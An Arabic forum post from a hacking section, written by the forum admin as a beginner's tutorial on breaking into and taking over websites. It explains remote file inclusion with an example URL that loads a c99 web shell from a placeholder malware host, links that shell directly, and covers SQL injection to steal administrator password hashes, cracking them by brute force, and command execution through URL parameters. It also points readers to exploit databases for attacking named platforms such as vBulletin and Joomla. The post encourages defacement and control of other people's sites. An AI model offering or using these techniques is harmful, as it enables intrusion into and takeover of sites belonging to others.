منتدى مجموعة تراقة لتطوير المواقع و المعلوماتية

منتديات تراقة التابعة لمنتدى الإشراقات العلمية ، بها كل ما تحتاجونه من معلومات حول تطوير مواقع phpbb و استخدام البرامج المعلوماتية المشهورة ، .....
 
الرئيسيةس .و .جبحـثالتسجيلدخول

شاطر | 
 

 تعلم إختراق المواقع

استعرض الموضوع السابق استعرض الموضوع التالي اذهب الى الأسفل 
كاتب الموضوعرسالة
dahmanekeddi
Admin


عدد المساهمات : 14
تاريخ التسجيل : 02/10/2008
العمر : 29
الموقع : taraga.hooxs.com

مُساهمةموضوع: تعلم إختراق المواقع   الأحد ديسمبر 28 2008, 02:40

من اجل الدين ياملون تعلم اختراق المواقع و السيطرة عليها



او حتى الدين تعلموه ولم يهضموا بعد الاساسيات



سنبدا اولا ببعض الامور التي لا بد ان تعرفها لكي تبدا معنا الرحلة الممتعة في الاختراق



ان سالتك ما هو السيرفر



Serveur

مادا ستقول لي ؟ انا لا اعرف مادا ستقول



لكن انا انا اقول لك ان السيرفر هو جهاز حاسوب



فائق المواصفات من حيت السرعة و عدة مميزات كتيرة



زيادة الى انه شغال 24 ساعة على 24 ساعة بدون توقف



مما يجعلنا نرى اي موقع نريده في اي وقت نريده



فان اطفئ السيرفر لن تستطيع حتى ان تشم رائحة الموقع هههههههههههه



و هده االسيرفرات تملكها شركات استضافة .يعني انك تشتري مساحة في سيرفرها



و هناك العديد من السيرفرات في العالم



و كل سيرفر يحتوي على عدد غير محدود من المواقع





الان اصبحت تعرف ما هو السيرفر Serveur الان نمر الى شىء اخر

و هي لغات برمجة صفحات الويب (perl -python-php-asp-html)

يعني ان اي موقع تراه على الشبكة لابد ان يكون قد صمم باحد هده اللغات و باجمعها او على الاقل html







اولا لتخترق موقعا يا سعيد الحظ يجب ان يحتوي الموقع على تغرة

تمكنك من استغلالها و التحكم في الموقع و تغيير الصفحة الرئيسية



اولا :ما هي التغرات



التغرات يا اخي هي اخطاء في السكريبتات المستعملة في الموقع و السكريبتات هي البرامج المستعملة

متلا (سكريبت التحقق من كلمة السر ,سكريبت المنتدى ...)



و تكون مصممة بلغات برمجية مختلفة متل (php -perl-python) التي سبق ان تكلمنا عنها



يعني فقط خطا صغير من المبرمج يسبب في فقدانه للموقع و سنتطرق الان الى هده الاخطاء و تبسيطها



يجب ان تعرف ان التغرات كتيرة و لكل تغرة استغلالها



اول نوع و المحبوب لدى المخترقين و هو



remote file inclusion



هده التغرة تمكن المخترق من ادراج ملف خارجي الى ملفات الموقع المصاب



و لكي نبسط اكتر فان المبرمج يطلب من برنامجه ادراج صفحة ما في ملفات موقعه ليراها المتصفح

و لكن لا يحصر تلك الصفحة فقط مما يجعل المخترق يدرج ملف من اختياره



و غالبا ما ندرج ملف يسمى shell يمكننا من التجول في ملفات الموقع و رؤيتها و التصرف فيها حسب صلاحيتنا

و هناك انواع من هدا الشيل المصمم بلغة php متل c99 و r57 وكلها تؤدي نفس الغرض

و طريقة استعمال هدا الشيل تكون كالاتي :



ناخد كمتال موقع في عنوانه الاتي

www.site.com/index.php?page=login.php



www.site.com و هو العنوان الرئيسي للموقع كاي موقع اخر

index.php : وهي صفحة الويب الرئيسية التي يتوجه اليها المتصفح دون نقاش

بعد كتابة عنوان الموقع و قد تكون ايضا home او default

: ?علامة الاستعلام و تكتب لتترك المجال للتغريف بالمتغيرات الاخرى

page متغير كتبه المبرمج و يدل على الصفحة التي يجب ان يتم استدعاؤها و اظهارها و في هده الحالة

login.php و هي الصفحة التي طلب المبرمج استدعاؤها و ستظهر على المتصفح



و التغرة في هده الحالة هي ان بامكاننا ان نغيرالمتغير page الى ملف اخر غير login.php

و استغلال التغرة يكون هكدا :

http://www.site.com/index.php?page=h...m/shellc99.txt ?





كما رايتم قمنا بتغيير المتغير page بالملف الموجود في prob01.malware-site.www



وهو shellc99.txt تم وضعنا علامة ? ليتم قراءة الملف كملف php



الان و بعد تطبيقنا للتغرة اللديدة سيظهر الشيل و عليه ملفات الموقع ما عليك سوى البحت عن اي شئ



يفيدك في الاختراق



لن اتكلم عن استعمال الشيل و لكن عندما ترفع الشيل اتصل بي و ساضع موضوعا لاستعمال الشيل



و ان لم تكن تملك شيلا فاستعمل هدا الشيل
http://prob01.malware-site.www/shellc99.txt



و اما الموقع الدي تجده فيه التغرات جاهزة مع الاستغلال فهو www.milw0rm.com



و هناك مواقع عديدة لكن هدا احسنها



و ما في حالة كنت تخطط لاختراق موقع بعينه فما عليك الا البحت عن السكريبت الدي يستعمله و اكتب في



google

script exploit

مع تعويض script بالسكريبت لديك



الان نمر للنوع التاني من التغرات



تانيا :تغرات



remote sql injection



هدا النوع من التغرات يعتمد على الاخطاء في السكريبتات التي تتعامل مع قاعدة البيانات

و قاعدة البيانات كما يدل عليها اسمها



مكان للتخزين العشوائي للمعلمومات لاستعمالها بشكل منظم في صفحات الويب



و قاعدة البيانات تحتوي على اسماء و الارقام السرية

لمستعملي الموقع و كدلك الرقم السري لصاحب الموقع او ما يسمى بالمدير



و ان استطعنا ان نحصل على باس المدير سنستطيع الدخول به الى اعدادات الموقع و السيطرة عليه



و هدا النوع من التغرات نتائجه %75



و السبب هو حصولنا على الرقم السري المشفر يعني لابد من فك تشفيره



و يكون مشفرا بمعيار md5 وهو اصعب تشفير في مجال المواقع و لحد الان لا توجد البرامج لفك تشفيره



لكن توجد برامج لتشفير الرقم السري يعني تعطيه رقمك و يحوله الى كود من 32 رقم و لا يمكن بعد فك تشفيره



الا بطريقة واحدو و وحيدة هي عن طريق التخمين



و يعمل التخمين بالتقنية التالية : يبدا بتجربة جميع



الارقام الموجودة يعني كلها ان اعطيته الوقت و يشفرها و يقارنها



ب md5 الدي اعطيته فان كانت المقارنة هي التساوي فقد فك التشفير



المهم ان التغرة لها صدى كبير من الرغم دلك و عليك ان تعلم ان الحماية ما صنعت الا لتخترق ههههههه



تالتا :تغرات



commande execusion



و هده التغرات في المواقع تسمح لنا باعطاء امر للسيرفر serveur

الدي يحمل ملفات الموقع المستهدف

متلا :

www.myvictim.com/index.php?id=commande



و مكان commande نضع الامر الدس نريده متلا



الامر dir لاستعراض ملفات الموقع كلها و كدلك ls



و غيرها من الاموامر و عليك ان تتدكر ان هده الاموامر فقط لنظام التشغيل linux و ليس

windows

و اوامر الويندوز يعرفها الكل





الان انتهينا من شرح انواع التغرات و موقع

milw0rm.com

يضع جديد التغرات المستكشفة في سكريبتات العالم ههههه

و هي موجودة في فقرة



web apps



و اود ان اخبر المبتدئين ببعض السكريبتات المشهورة

vbulletin اشهر منتدى في العالم و المطلوية تغراته بكترة ,

phpbb منتدى مشهور

phpnuk مجلة

joomla مجلة

و العديد من السكريبتات التي تصصمها شركات مختصة المحترفة منها و العادية



و انا انصح اي واحد يحب اختراق المواقع

ان يتعلم لغة php

و على فكرة فهي لغة سهلة و تفيد في الاختراق

و لا اريد اي مبتدئ ان يظن ان الامر صعب فانا على جدير الدكر تعلمت اختراق المواقع و اساسيته في شهرين فقط

لكن كلما تدربت في التغرات و حاولت اكتشافها لنفسك ستحترف ان شاء الله

بعد هدا الشرح كله تكون قد وضعت يدك على القاعدة القوية في اختراق المواقع و انقدتك من المعلومات المتشتتة التي تحصل عليها

في المواقع الاخرى

و تدكروا ان جميع الامتلة التي و ضعتها فقط هي امتلة و دلك لوجود استغلالات طويلة في عنوان url

ارجوا انا يتال الموضوع حقه من الردود
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو http://taraga.hooxs.com
 
تعلم إختراق المواقع
استعرض الموضوع السابق استعرض الموضوع التالي الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
منتدى مجموعة تراقة لتطوير المواقع و المعلوماتية :: قسم الأنترنيت :: منتدى التجسس و القرصنة-
انتقل الى: